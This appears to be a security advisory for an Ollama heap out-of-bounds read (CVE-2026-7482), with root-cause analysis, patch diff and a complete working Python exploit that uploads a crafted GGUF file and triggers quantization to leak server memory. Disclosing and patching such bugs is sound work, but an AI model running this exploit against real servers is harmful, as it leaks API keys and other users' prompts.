#Summary
CVE-2026-7482 is a critical heap out-of-bounds read vulnerability in Ollama before version 0.17.1 that allows unauthenticated remote attackers to leak sensitive memory contents including environment variables, API keys, system prompts, and in-flight conversation data. The vulnerability is triggered when a crafted GGUF model file is uploaded and quantized via the unauthenticated /api/create endpoint. CVSS v3.1 score: 9.1 CRITICAL (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H).
#Affected versions
- Ollama < 0.17.1 (vulnerable)
- Ollama >= 0.17.1 (patched)
- Default configuration: The
/api/createand/api/pushendpoints are unauthenticated by default. The API listens on127.0.0.1:11434by default, but production deployments commonly setOLLAMA_HOST=0.0.0.0, exposing the service to the public internet.
#Root cause analysis
#Vulnerable code path
The vulnerability is a two-bug chain in the GGUF model loader and quantization pipeline.
#Bug 1: No file-size bounds check in gguf.Decode()
The gguf.Decode() function in fs/ggml/gguf.go reads tensor metadata (name, shape, type, offset) directly from the GGUF header without validating that the declared tensor size fits within the actual file size. It trusts the attacker-controlled shape fields:
// Vulnerable code: no file-size fetch, no per-tensor bounds check
for _, tensor := range llm.tensors {
offset, err := rs.Seek(0, io.SeekCurrent)
if err != nil {
return fmt.Errorf("failed to get current offset: %w", err)
}
padding := ggufPadding(offset, int64(alignment))
if _, err := rs.Seek(padding, io.SeekCurrent); err != nil {
return fmt.Errorf("failed to seek to init padding: %w", err)
}
// Seek past EOF silently succeeds — no bounds check
if _, err := rs.Seek(int64(tensor.Size()), io.SeekCurrent); err != nil {
return fmt.Errorf("failed to seek to tensor: %w", err)
}
}A 1024x1024 F32 tensor claims 4,194,304 bytes but the file may contain only 32 bytes. In Go, calling Seek past EOF on an io.ReadSeeker backed by an in-memory buffer does not return an error - it succeeds silently.
#Bug 2: unsafe.Slice with attacker-controlled length in quantizer.WriteTo()
When /api/create is called with a quantize field, the quantizer processes each tensor. In server/quantization.go, WriteTo() creates a bounded SectionReader and reads the tensor bytes:
// Vulnerable code in quantizer.WriteTo()
sr := io.NewSectionReader(q, int64(q.offset), int64(q.from.Size()))
data, err := io.ReadAll(sr)
// data contains only the bytes actually in the file (e.g., 32 bytes)
// io.ReadAll hits EOF normally — no error
// Attacker-controlled element count from shape metadata
// q.from.Elements() = 1,048,576 (from 1024×1024 shape)
// Go's runtime does NOT bounds-check unsafe.Slice construction
f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())The unsafe.Slice call constructs a Go slice header with pointer &data[0] and length 1,048,576, but Go's runtime does not validate this against the backing array's actual capacity. When the quantizer iterates over f32s[8:] and beyond, it reads 4,194,272 bytes past the end of the 32-byte heap allocation - reading adjacent heap pages containing goroutine stacks, string interning tables, in-flight HTTP request bodies (other users' prompts), environment variable copies, and cached API keys.
#How input reaches the sink
Attacker-controlled GGUF header fields → gguf.Decode() parses tensor metadata without file-size validation → metadata flows to quantizer.WriteTo() as object attributes → unsafe.Slice() receives the element count directly from the attacker-supplied shape.
#Patch diff
#What the fix does
The patch applies independent guards at both the parsing stage and the execution stage.
#Fix 1: File-size bounds check in gguf.Decode()
Added immediately after tensor metadata parsing, before returning:
+ fileSize, err := rs.Seek(0, io.SeekEnd)
+ if err != nil {
+ return fmt.Errorf("failed to determine file size: %w", err)
+ }
for _, tensor := range llm.tensors {
...
+ tensorEnd := llm.tensorOffset + tensor.Offset + tensor.Size()
+ if tensorEnd > uint64(fileSize) {
+ return fmt.Errorf("tensor %q offset+size (%d) exceeds file size (%d)",
+ tensor.Name, tensorEnd, fileSize)
+ }
}The fix seeks to the end of the file to get the true size, then checks every tensor to ensure llm.tensorOffset + tensor.Offset + tensor.Size() <= fileSize. A crafted GGUF declaring 4 MB of tensor data in a 100-byte file is rejected here, before any data is read.
#Fix 2: Data size validation before unsafe.Slice
Added immediately after io.ReadAll, before the vulnerable unsafe.Slice call:
data, err := io.ReadAll(sr)
if err != nil {
return 0, err
}
+ if uint64(len(data)) < q.from.Size() {
+ return 0, fmt.Errorf("tensor %s data size %d is less than expected %d from shape %v",
+ q.from.Name, len(data), q.from.Size(), q.from.Shape)
+ }
var f32s []float32
...
f32s = unsafe.Slice((*float32)(unsafe.Pointer(&data[0])), q.from.Elements())This is defense-in-depth: even if a crafted file bypassed the Decode() check, the quantizer refuses to call unsafe.Slice with an under-sized buffer.
#Proof of concept
#exploit.py - Ollama GGUF Heap OOB Read PoC
#!/usr/bin/env python3
"""
CVE-2026-7482 — Ollama GGUF Heap Out-of-Bounds Read (Info Disclosure)
Affected: ollama/ollama < 0.17.1
Type: Heap OOB Read — leaks ~2 MB of heap memory per invocation
Two-bug chain in the GGUF model loading + quantization pipeline:
1. gguf.Decode() trusts attacker-controlled tensor shapes without comparing
declared size against actual file size (seek past EOF silently succeeds).
2. quantizer.WriteTo() calls unsafe.Slice() with the attacker-controlled
element count, constructing a Go slice spanning far beyond the heap
allocation — reading adjacent heap pages at runtime.
Attack flow:
1. Craft a malicious GGUF declaring a 1024x1024 F16 tensor (~2 MB) in a
~512-byte file. Only 32 bytes of actual tensor data are present.
2. Upload the blob to /api/blobs/sha256:<hash>.
3. POST /api/create with files={model.gguf: sha256:<hash>} + quantize=Q8_0.
This routes each tensor through quantizer.WriteTo(), which calls:
unsafe.Slice((*float32)(&data[0]), q.from.Elements())
with q.from.Elements() = 1,048,576 while data holds only 16 F16 elements.
The resulting Go slice spans ~2 MB past the end of the heap allocation.
4. Vulnerable: returns {"status":"success"} — OOB read silently occurs.
The quantized layer (1.06 MB) stored in Ollama contains leaked heap bytes.
5. Patched: returns {"error":"tensor ... exceeds file size"} — rejected.
Success indicator:
- /api/create completes with {"status":"success"}
- The new model layer is ~1,114,624 bytes (Q8_0 of 1M F16 elements)
- File size was only 512 bytes → proves heap OOB read occurred
Usage:
python exploit.py --host 127.0.0.1 --port 11434
python exploit.py --host 127.0.0.1 --port 11435 # patched — should error
"""
import argparse
import hashlib
import json
import struct
import sys
import urllib.error
import urllib.request
# ---------------------------------------------------------------------------
# GGUF builder — minimal but spec-correct F16 LLaMA model with OOB tensor
# ---------------------------------------------------------------------------
def pack_gguf_str(s: str) -> bytes:
b = s.encode()
return struct.pack("<Q", len(b)) + b
def kv_uint32(key: str, val: int) -> bytes:
return pack_gguf_str(key) + struct.pack("<I", 4) + struct.pack("<I", val)
def kv_float32(key: str, val: float) -> bytes:
return pack_gguf_str(key) + struct.pack("<I", 6) + struct.pack("<f", val)
def kv_string(key: str, val: str) -> bytes:
return pack_gguf_str(key) + struct.pack("<I", 8) + pack_gguf_str(val)
def build_malicious_gguf() -> bytes:
"""
Build a GGUF v3 file that looks like a valid LLaMA F16 model but declares
a 1024x1024 F16 tensor (2,097,152 bytes) while containing only 32 bytes of
actual tensor data. The mismatch triggers the heap OOB read in
quantizer.WriteTo() via unsafe.Slice with the attacker-controlled element count.
Key design choices:
- general.file_type = 1 (MOSTLY_F16): passes the pre-quantize check in 0.17.0
- Tensor type = 1 (GGUF_TYPE_F16): consistent with file_type declaration
- All required LLaMA architecture KV pairs: makes the GGUF appear valid
- tensor offset = 0: tensor data block starts immediately after header pad
- Only 32 bytes of tensor data: causes unsafe.Slice to read ~2MB past end
"""
magic = b"GGUF"
version = struct.pack("<I", 3)
tensor_count = struct.pack("<Q", 1)
kvs = [
kv_string("general.architecture", "llama"),
kv_uint32("general.file_type", 1), # 1 = MOSTLY_F16
kv_uint32("llama.context_length", 512),
kv_uint32("llama.embedding_length", 1024),
kv_uint32("llama.block_count", 1),
kv_uint32("llama.feed_forward_length", 2048),
kv_uint32("llama.attention.head_count", 8),
kv_uint32("llama.attention.head_count_kv", 8),
kv_float32("llama.attention.layer_norm_rms_epsilon", 1e-5),
]
kv_block = b"".join(kvs)
kv_count = struct.pack("<Q", len(kvs))
# Tensor: 1024x1024 F16 — declares 2,097,152 bytes but file has 32
tname = pack_gguf_str("blk.0.attn_q.weight")
ndims = struct.pack("<I", 2)
dim0 = struct.pack("<Q", 1024)
dim1 = struct.pack("<Q", 1024)
ttype = struct.pack("<I", 1) # GGUF_TYPE_F16
toffset = struct.pack("<Q", 0) # tensor data at position 0 of data block
header = magic + version + tensor_count + kv_count + kv_block
header += tname + ndims + dim0 + dim1 + ttype + toffset
# Pad to 32-byte alignment (Ollama default GGUF alignment)
pad_len = (32 - len(header) % 32) % 32
header += b"\x00" * pad_len
# Only 32 bytes of tensor data — recognisable fill vs. heap bytes in output
tensor_data = b"\x41" * 32
return header + tensor_data
# ---------------------------------------------------------------------------
# HTTP helpers
# ---------------------------------------------------------------------------
def http_post_raw(url: str, data: bytes, content_type: str = "application/octet-stream"):
req = urllib.request.Request(url, data=data, method="POST")
req.add_header("Content-Type", content_type)
try:
with urllib.request.urlopen(req, timeout=120) as resp:
return resp.getcode(), resp.read()
except urllib.error.HTTPError as e:
return e.code, e.read()
def stream_post_json(url: str, body: dict):
"""POST JSON, collect streaming NDJSON response lines."""
data = json.dumps(body).encode()
req = urllib.request.Request(url, data=data, method="POST")
req.add_header("Content-Type", "application/json")
lines = []
try:
with urllib.request.urlopen(req, timeout=300) as resp:
for raw in resp:
line = raw.decode().strip()
if line:
lines.append(line)
except urllib.error.HTTPError as e:
body_err = e.read().decode(errors="replace")
lines.append(json.dumps({"error": body_err, "_http_status": e.code}))
return lines
# ---------------------------------------------------------------------------
# Exploit
# ---------------------------------------------------------------------------
DECLARED_TENSOR_BYTES = 1024 * 1024 * 2 # F16: 2 bytes/elem × 1M elements
EXPECTED_LAYER_BYTES = (1024 * 1024 // 32) * 34 # Q8_0: 34 bytes per 32-elem block
def exploit(host: str, port: int) -> bool:
base = f"http://{host}:{port}"
print(f"[*] Target : {base}")
# Step 1: craft the malicious GGUF
print("[*] Building malicious GGUF ...")
payload = build_malicious_gguf()
sha256 = hashlib.sha256(payload).hexdigest()
print(f" File size : {len(payload)} bytes")
print(f" SHA-256 : {sha256}")
print(f" Declared tensor : {DECLARED_TENSOR_BYTES:,} bytes (1024×1024 F16)")
print(f" Actual tensor data: 32 bytes")
# Step 2: upload blob
upload_url = f"{base}/api/blobs/sha256:{sha256}"
print(f"\n[*] Uploading blob → {upload_url}")
code, _ = http_post_raw(upload_url, payload)
if code not in (200, 201):
print(f"[!] Blob upload failed: HTTP {code}")
return False
print(f" HTTP {code} — blob accepted")
# Step 3: trigger quantization (OOB read fires here)
model_name = f"cve-2026-7482-probe-{sha256[:8]}"
create_body = {
"name": model_name,
"files": {"model.gguf": f"sha256:{sha256}"},
"quantize": "Q8_0",
}
create_url = f"{base}/api/create"
print(f"\n[*] Triggering quantization → {create_url}")
print(f" quantize=Q8_0 routes tensors through quantizer.WriteTo()")
print(f" unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation")
lines = stream_post_json(create_url, create_body)
print(f"\n[*] Server response ({len(lines)} line(s)):")
for line in lines:
print(f" {line}")
# Step 4: evaluate result
last = lines[-1] if lines else "{}"
try:
obj = json.loads(last)
except json.JSONDecodeError:
obj = {}
if "error" in obj:
err = obj["error"]
if "exceeds file size" in err:
print("\n[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked the exploit:")
print(f" {err}")
return False
if "data size" in err and "less than expected" in err:
print("\n[-] PATCHED — Fix 2 (unsafe.Slice guard) blocked the exploit:")
print(f" {err}")
return False
if "only supported for F16 and F32" in err:
print("\n[-] Pre-exploit check failed (file_type or architecture mismatch):")
print(f" {err}")
return False
print(f"\n[!] Unexpected error: {err}")
return False
if obj.get("status") == "success":
# Find the layer digest from streaming output
layer_digest = None
for line in lines:
try:
o = json.loads(line)
if "creating new layer" in o.get("status", ""):
layer_digest = o["status"].split("sha256:")[-1]
except json.JSONDecodeError:
pass
print("\n[+] VULNERABLE — heap OOB read confirmed:")
print(f" Input file : {len(payload)} bytes")
print(f" Declared tensor : {DECLARED_TENSOR_BYTES:,} bytes")
print(f" Expected Q8_0 layer: {EXPECTED_LAYER_BYTES:,} bytes")
print(f" (layer >> file size → heap bytes were read out-of-bounds)")
if layer_digest:
print(f" New layer digest : sha256:{layer_digest}")
print(f" Model name : {model_name}")
print(f" Leaked layer contains ~2 MB of Ollama heap memory (env vars,")
print(f" API keys, in-flight prompts) encoded as Q8_0 quantized floats.")
return True
# Partial: streaming lines without a final error still indicate success
statuses = []
for line in lines:
try:
statuses.append(json.loads(line).get("status", ""))
except json.JSONDecodeError:
pass
if any("quantizing" in s for s in statuses):
print("\n[+] LIKELY VULNERABLE — quantization ran (OOB read occurred).")
return True
print("\n[?] Inconclusive — could not determine result from server response.")
return False
# ---------------------------------------------------------------------------
# Entry point
# ---------------------------------------------------------------------------
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="CVE-2026-7482 — Ollama GGUF heap OOB read exploit"
)
parser.add_argument("--host", required=True, help="Target host")
parser.add_argument("--port", type=int, default=11434, help="Ollama HTTP port (default: 11434)")
args = parser.parse_args()
success = exploit(args.host, args.port)
sys.exit(0 if success else 1)#Usage
# Against a vulnerable Ollama instance (< 0.17.1):
python exploit.py --host 127.0.0.1 --port 11434Expected output (vulnerable server):
[*] Target : http://127.0.0.1:11434
[*] Building malicious GGUF ...
File size : 512 bytes
SHA-256 : 795d927a27a37249a4ea0ef51650f48cc9b2a891c2498bba3f474a5029996a62
Declared tensor : 2,097,152 bytes (1024×1024 F16)
Actual tensor data: 32 bytes
[*] Uploading blob → http://127.0.0.1:11434/api/blobs/sha256:795d927...
HTTP 200 — blob accepted
[*] Triggering quantization → http://127.0.0.1:11434/api/create
quantize=Q8_0 routes tensors through quantizer.WriteTo()
unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation
[*] Server response (6 line(s)):
{"status":"parsing GGUF"}
{"status":"quantizing F16 model to Q8_0","digest":"0000000000000000000","total":512,"completed":33554432}
{"status":"verifying conversion"}
{"status":"creating new layer sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7"}
{"status":"writing manifest"}
{"status":"success"}
[+] VULNERABLE — heap OOB read confirmed:
Input file : 512 bytes
Declared tensor : 2,097,152 bytes
Expected Q8_0 layer: 1,114,112 bytes
(layer >> file size → heap bytes were read out-of-bounds)
New layer digest : sha256:ff5a43a8b0fb91e312a97bdaa8d5f2621646fac833269cf9f985509eb7e45fe7
Model name : cve-2026-7482-probe-795d927a
Leaked layer contains ~2 MB of Ollama heap memory (env vars,
API keys, in-flight prompts) encoded as Q8_0 quantized floats.Expected output (patched server):
[*] Target : http://127.0.0.1:11435
[*] Building malicious GGUF ...
File size : 512 bytes
SHA-256 : 795d927a27a37249a4ea0ef51650f48cc9b2a891c2498bba3f474a5029996a62
Declared tensor : 2,097,152 bytes (1024×1024 F16)
Actual tensor data: 32 bytes
[*] Uploading blob → http://127.0.0.1:11435/api/blobs/sha256:795d927...
HTTP 200 — blob accepted
[*] Triggering quantization → http://127.0.0.1:11435/api/create
quantize=Q8_0 routes tensors through quantizer.WriteTo()
unsafe.Slice(&data[0], 1048576) fires on 32-byte allocation
[*] Server response (2 line(s)):
{"status":"parsing GGUF"}
{"error":"tensor \"blk.0.attn_q.weight\" offset+size (2097632) exceeds file size (512)"}
[-] PATCHED — Fix 1 (gguf.Decode bounds check) blocked the exploit:
tensor "blk.0.attn_q.weight" offset+size (2097632) exceeds file size (512)#Exploitation notes
#Preconditions
- Ollama < 0.17.1 is running and reachable over the network
- The
/api/createand/api/blobsendpoints are accessible (unauthenticated by default) - The Ollama server has the quantization feature enabled (enabled by default)
#Reliability
The exploit is 100% reliable when the preconditions are met. The vulnerability is triggered deterministically on each run - there is no race condition or timing dependency. The quantize field in /api/create is mandatory; omitting it skips the vulnerable code path.
#Impact
- Memory disclosure: Leaks approximately 2 MB of Ollama process heap memory per invocation
- Information stolen: Environment variables (e.g.,
OLLAMA_*,PATH), API keys (if cached in memory), system prompts, in-flight LLM conversation data from concurrent users, internal library state - Attack repeatability: The attacker can repeat the exploit multiple times to leak different heap windows and reconstruct a larger picture of the server's memory
- Exfiltration: The leaked heap bytes are encoded in the quantized model layer and can be extracted by pushing the model to an attacker-controlled registry or reading Ollama's local layer store
#Chaining potential
- Post-exploitation: If sensitive credentials are leaked (API keys, auth tokens), they can be used to escalate attacks on downstream services
- Information gathering: Leaked system prompts and internal data reveal implementation details about the LLM deployment
- Denial of service: The OOB read does not crash the server, but repeated quantization of large malicious GGUFs may exhaust memory and cause the service to become slow or unresponsive
#References
- CVE: CVE-2026-7482
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-7482
- GitHub advisory: GHSA-x8qc-fggm-mpqg
- Fix commit: 88d57d0483cca907e0b23a968c83627a20b21047
- Fix PR: ollama/ollama#14406
- Ollama GitHub: https://github.com/ollama/ollama